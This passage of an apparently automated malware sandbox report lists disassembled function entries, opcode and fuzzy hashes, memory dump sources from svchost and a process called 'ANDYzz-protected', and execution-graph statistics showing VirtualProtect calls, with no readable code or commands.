                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f1aa963e979936634f348da6469cc753d75793561ac52e56eefe369dcf482a
                                                                        • Instruction ID: 7a1a46cb8e7d110f78c97a16e758da24361f58c7caf2a018fec0008ca218bc4b
                                                                        • Opcode Fuzzy Hash: e1f1aa963e979936634f348da6469cc753d75793561ac52e56eefe369dcf482a
                                                                        • Instruction Fuzzy Hash: 8AE092B66046408B9650CF0AFC81456F7D8EB88630718C07FDC0D8B701E236B508CAA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0658204B Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0731b04222093ea64e9dd38f544b6bc526b4959678009daaae506697fb63976b
                                                                        • Instruction ID: 36d1faaa78a1d9de382403ba921b9ed4bfadc0b2c06a33a3a3078f2bca6aaeb2
                                                                        • Opcode Fuzzy Hash: 0731b04222093ea64e9dd38f544b6bc526b4959678009daaae506697fb63976b
                                                                        • Instruction Fuzzy Hash: 64E0D8B254030467D2108F06AC45F63FB9CDB44930F08C46BED081B742E172B5148AF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06581ED3 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0506e0ea5e3f629bdf38f1b37049853f800130cf1cdec6fcbeee66dc5d913618
                                                                        • Instruction ID: 217643a1a0127e195daa6fdba0767d5f606f2faca63db2c7088f555f53cfedda
                                                                        • Opcode Fuzzy Hash: 0506e0ea5e3f629bdf38f1b37049853f800130cf1cdec6fcbeee66dc5d913618
                                                                        • Instruction Fuzzy Hash: 0DE0D8B250020467D2509F06AC85F63FB9CDB44930F08C45BED081B742E172B5048AF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 065818F7 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40ee66b03ed55ba697e9bd61b6f227c9c114e578950e9ca1697c6634f3bfa9a2
                                                                        • Instruction ID: 92f9d9f656082f37c423437bcbfe6cc99f5df88ef4771fa72ebbe168bd157666
                                                                        • Opcode Fuzzy Hash: 40ee66b03ed55ba697e9bd61b6f227c9c114e578950e9ca1697c6634f3bfa9a2
                                                                        • Instruction Fuzzy Hash: DEE0D8B250020467D2109F06AC45F63FB9CDB44930F08C45BED081B742E172B514CAF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033CB177 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4085183956.00000000033CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ca000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11776a578a08abccf9a6c80db607f7855c6479cebeffb384d4082e442e44acd9
                                                                        • Instruction ID: 615594d266bd3302a8646d8c6ded146578c08a334f48b7ae7253cb304c8ae6b9
                                                                        • Opcode Fuzzy Hash: 11776a578a08abccf9a6c80db607f7855c6479cebeffb384d4082e442e44acd9
                                                                        • Instruction Fuzzy Hash: FFE020B254020467D2108F06AC45F63FB9CDB44931F08C55BED081B742E172B504CAF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC4200 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bee9f20b2697ae7755f699398da5185380ce712ebeea05159d96a222ce5c5737
                                                                        • Instruction ID: 168c1181ffe4e4f58d9f26b216337e9471e3c2ff22276961b78719e7546d8ea9
                                                                        • Opcode Fuzzy Hash: bee9f20b2697ae7755f699398da5185380ce712ebeea05159d96a222ce5c5737
                                                                        • Instruction Fuzzy Hash: 17E02B70A211089FC700DF78DC12BD8B3F9D704318F5005AAE409C3340DA35AE01CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC36A8 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f734d72e3f8c820befd96eb80d574e9e34f302aed066fcacd1c4f9fad80acb8
                                                                        • Instruction ID: 8ec07d8e69e294e5266edd04d8b302fefbe63f9b6c007173aa8c480c1a6ba057
                                                                        • Opcode Fuzzy Hash: 9f734d72e3f8c820befd96eb80d574e9e34f302aed066fcacd1c4f9fad80acb8
                                                                        • Instruction Fuzzy Hash: ADD017312223088BCB196634D05A62833B9AB4520DB90487CE4064A359EE3EED428A40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC94B1 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a00469db690a9998cd06f318fadec7c2ea9b30cdce82a48b07f5ca6bea1be71
                                                                        • Instruction ID: b2b076d229b01a9ee9d5f4628615195ece09d54a1a784fe0f3669288ab157fe3
                                                                        • Opcode Fuzzy Hash: 6a00469db690a9998cd06f318fadec7c2ea9b30cdce82a48b07f5ca6bea1be71
                                                                        • Instruction Fuzzy Hash: BFD0A73250010C77C705E6A2ED177AD77ECC741200F004C989807D3340EA3CFD045350
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033B23F4 Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084864518.00000000033B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33b2000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f5d606b97e86a3d2c9f6a4d97d95f7d068e5f0f4c9583f8a17cb2fb31798ded
                                                                        • Instruction ID: 295029c7a4d3bd0817161012e409cb2ab04415fb28e3d9dffc97286289024ad1
                                                                        • Opcode Fuzzy Hash: 1f5d606b97e86a3d2c9f6a4d97d95f7d068e5f0f4c9583f8a17cb2fb31798ded
                                                                        • Instruction Fuzzy Hash: 2DD02E393006C04FD312CA0CC5A8BCA3BE4AF40B05F0A08F9A800CBF63CB28D4C0D600
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC4210 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50dc6a9888df131e24280b2f8af9bd1d610ce6dca024a27eb6c8d9d615ecf5f4
                                                                        • Instruction ID: b1bfecc73ae901f1716d22418d919bd02842c60f6e5dd5b358f2484df900ba92
                                                                        • Opcode Fuzzy Hash: 50dc6a9888df131e24280b2f8af9bd1d610ce6dca024a27eb6c8d9d615ecf5f4
                                                                        • Instruction Fuzzy Hash: 09D0A930A21208EF8700EFA8D80089DB7F9EB04314B1000AAA809C3300EE326E10DB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033B23BC Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4084864518.00000000033B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 033B2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33b2000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7edbe3a7044f942ecbe55e2225079b513aeb4d0dab1bbb220402aa6edd2b93ad
                                                                        • Instruction ID: a8bfd24427dad6bfba6890c0d86010af97c86a9b081f3aead9951a56dcf5dcd3
                                                                        • Opcode Fuzzy Hash: 7edbe3a7044f942ecbe55e2225079b513aeb4d0dab1bbb220402aa6edd2b93ad
                                                                        • Instruction Fuzzy Hash: 0ED05E342002814BC716DA0CD6D4F9A77E4AB44B14F0A49E8AC10CBB62C7A4D8C0DA20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:18.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:3
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 2645 7ffd9b8b2225 2646 7ffd9b8b223f VirtualProtect 2645->2646 2648 7ffd9b8b2359 2646->2648

                                                                        Executed Functions

                                                                        Function 00007FFD9B8B250D Relevance: 1.7, APIs: 1, Instructions: 186memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 7ffd9b8b250d-7ffd9b8b2647 VirtualProtect 4 7ffd9b8b2649 0->4 5 7ffd9b8b264f-7ffd9b8b269d 0->5 4->5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.4143183750.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7ffd9b8b0000_ANDYzz-protected.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 5c999550a79789ce5cea4ca81da9adefd5e3957ceff86f512051857c68bb8968
                                                                        • Instruction ID: be83c8b579c57f60c437db7fdc71a2512e5e86308a12c3dd98e59b86887e6606
                                                                        • Opcode Fuzzy Hash: 5c999550a79789ce5cea4ca81da9adefd5e3957ceff86f512051857c68bb8968
                                                                        • Instruction Fuzzy Hash: 99514970908B5C8FDB58DF98D895BE9BBF1FB59310F1042AED049E7251DB70A981CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B8B2225 Relevance: 1.7, APIs: 1, Instructions: 185memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7 7ffd9b8b2225-7ffd9b8b2357 VirtualProtect 11 7ffd9b8b2359 7->11 12 7ffd9b8b235f-7ffd9b8b23ad 7->12 11->12
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.4143183750.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7ffd9b8b0000_ANDYzz-protected.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 5b69f039bea07777261dea2c6bcc1357b941e5fdce7b29e8742acf38cd8d082b
                                                                        • Instruction ID: 6ba7883d910c01be753c0c5d268b8566b339ab212fa6e111a4ee14aa0751c11d
                                                                        • Opcode Fuzzy Hash: 5b69f039bea07777261dea2c6bcc1357b941e5fdce7b29e8742acf38cd8d082b
                                                                        • Instruction Fuzzy Hash: 8C515A3090875C8FDB58DF98D895BE9BBF1FB69310F1042AED449E7252DB30A985CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B9E0807 Relevance: .3, Instructions: 292COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.4145229422.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7ffd9b9e0000_ANDYzz-protected.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7356fd918c50b16e6d97a4780e2ca9d56e481efcdc55db8cde3dae8062fffa92
                                                                        • Instruction ID: 501f3de1047dd0970dde0c1772d6c94bd6448b08fba992bca6cb2d958fd7cb84
                                                                        • Opcode Fuzzy Hash: 7356fd918c50b16e6d97a4780e2ca9d56e481efcdc55db8cde3dae8062fffa92
                                                                        • Instruction Fuzzy Hash: 1B914D2161E7894FE7569B6C88367A57BE0EF06310F0941FED089CB1E3DA2C6D46C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B9E0158 Relevance: .2, Instructions: 157COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 329 7ffd9b9e0158-7ffd9b9e015f 330 7ffd9b9e0165-7ffd9b9e01ab 329->330 331 7ffd9b9e08a3-7ffd9b9e08f9 329->331 334 7ffd9b9e01b1-7ffd9b9e01ba 330->334 345 7ffd9b9e0901-7ffd9b9e0914 331->345 336 7ffd9b9e01bc-7ffd9b9e01cf 334->336 337 7ffd9b9e01d0-7ffd9b9e01e3 334->337 336->337 337->331 342 7ffd9b9e00ff-7ffd9b9e0103 337->342 344 7ffd9b9e0109-7ffd9b9e011d 342->344 342->345 344->345 347 7ffd9b9e0123-7ffd9b9e013e 344->347 347->342 349 7ffd9b9e0140-7ffd9b9e0154 347->349 349->345
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.4145229422.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7ffd9b9e0000_ANDYzz-protected.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0a1a33fdc14ad4f80ad1e144c589911f8aaba4e1cec4efcab328c3cf88ba136c
                                                                        • Instruction ID: f38f56426674ee3ad2152aa19e9dd729de62b8503cc9cec604abf01330aee51e
                                                                        • Opcode Fuzzy Hash: 0a1a33fdc14ad4f80ad1e144c589911f8aaba4e1cec4efcab328c3cf88ba136c
                                                                        • Instruction Fuzzy Hash: D741393171DA4D4FE798DB6C982B77473C1EB56720F1402BED08AC32E2DD19AD428381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00007FFD9B79EFE4 Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 375 7ffd9b79efe4-7ffd9b79f019 379 7ffd9b79f02a-7ffd9b79f02c 375->379 380 7ffd9b79f01b-7ffd9b79f025 375->380 382 7ffd9b79f02d-7ffd9b79f09b 379->382 381 7ffd9b79f027 380->381 380->382 381->379 384 7ffd9b79f09d-7ffd9b79f0a4 382->384 385 7ffd9b79f0a6-7ffd9b79f0bf 384->385 386 7ffd9b79f0cb-7ffd9b79f0e0 384->386 387 7ffd9b79f0c3-7ffd9b79f0c9 385->387 387->384
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.4142621613.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_7ffd9b79d000_ANDYzz-protected.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4719207e2cd6a494a9fbed0fa4c459f618f96611281a1911e5ce461fe604c53e
                                                                        • Instruction ID: c3181e049ae4802f15ae383972943c898ca4e86f3d2dad37c5423a07384d4bf2
                                                                        • Opcode Fuzzy Hash: 4719207e2cd6a494a9fbed0fa4c459f618f96611281a1911e5ce461fe604c53e
                                                                        • Instruction Fuzzy Hash: E041F67150EBC84FE7569B3C9855A623FF0EF46320B1506DFD088CB1A7D629B84AC792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%